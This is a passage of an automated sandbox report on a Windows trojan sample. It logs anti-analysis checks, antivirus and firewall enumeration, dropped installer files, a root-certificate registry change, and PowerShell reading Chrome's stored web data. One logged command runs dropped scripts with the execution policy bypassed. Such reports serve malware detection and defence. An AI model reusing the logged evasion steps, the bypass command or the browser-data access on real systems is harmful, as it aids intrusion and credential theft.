          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep count: 3335 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep count: 1481 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -590579s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 590579
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3335
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1481
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI6B3B.tmp
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI6AAC.tmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi6220.tmp
          Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI6AFB.tmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: powershell.exe, 00000006.00000003.382712496.000000000619A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: powershell.exe, 00000006.00000003.382712496.000000000619A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-VlB
          Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00506840 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus,0_2_00506840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_004927F0 ReadFile,FindFirstFileW,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_004927F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0046C9A0 FindFirstFileW,GetLastError,FindClose,0_2_0046C9A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0046C040 _wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_0046C040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0046E270 FindFirstFileW,FindClose,0_2_0046E270
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_004B08C0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_004B08C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0047AB40 FindFirstFileW,FindClose,FindClose,0_2_0047AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0049CDD0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_0049CDD0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_003711B0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_003711B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0049D1D0 FindFirstFileW,FindClose,0_2_0049D1D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00451410 FindFirstFileW,FindNextFileW,FindClose,0_2_00451410
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe File Volume queried: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install FullSizeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00481960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc,0_2_00481960
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0053A0DB mov eax, dword ptr fs:[00000030h] 0_2_0053A0DB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0053A11F mov eax, dword ptr fs:[00000030h] 0_2_0053A11F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0052B5D7 mov ecx, dword ptr fs:[00000030h] 0_2_0052B5D7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0051F9A7 mov esi, dword ptr fs:[00000030h] 0_2_0051F9A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_005250F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005250F3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0049FBF0 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_0049FBF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0051FA13 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_0051FA13
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0038B0B0 __set_se_translator,SetUnhandledExceptionFilter,0_2_0038B0B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_00520536 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00520536
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0038DA20 __set_se_translator,SetUnhandledExceptionFilter,0_2_0038DA20

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Process created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\helper company llc\helper 1.0.0\install\helper.msi" ai_setupexepath=c:\users\user\desktop\securiteinfo.com.win32.trojan-gen.16963.11783.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1692672474 "
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss6e59.ps1" -propfile "c:\users\user\appdata\local\temp\msi6e45.txt" -scriptfile "c:\users\user\appdata\local\temp\scr6e46.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr6e47.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: 0_2_0046E790 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,0_2_0046E790
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Code function: GetLocaleInfoW,GetLocaleInfoW,0_2_00495A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00520F72 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00520F72
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004AAC30 GetUserNameW,GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,0_2_004AAC30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004AC2F0 CreateNamedPipeW,CreateFileW,0_2_004AC2F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00357480 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00357480
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB BlobJump to behavior
          Source: powershell.exe, 00000006.00000003.396230432.0000000007A68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
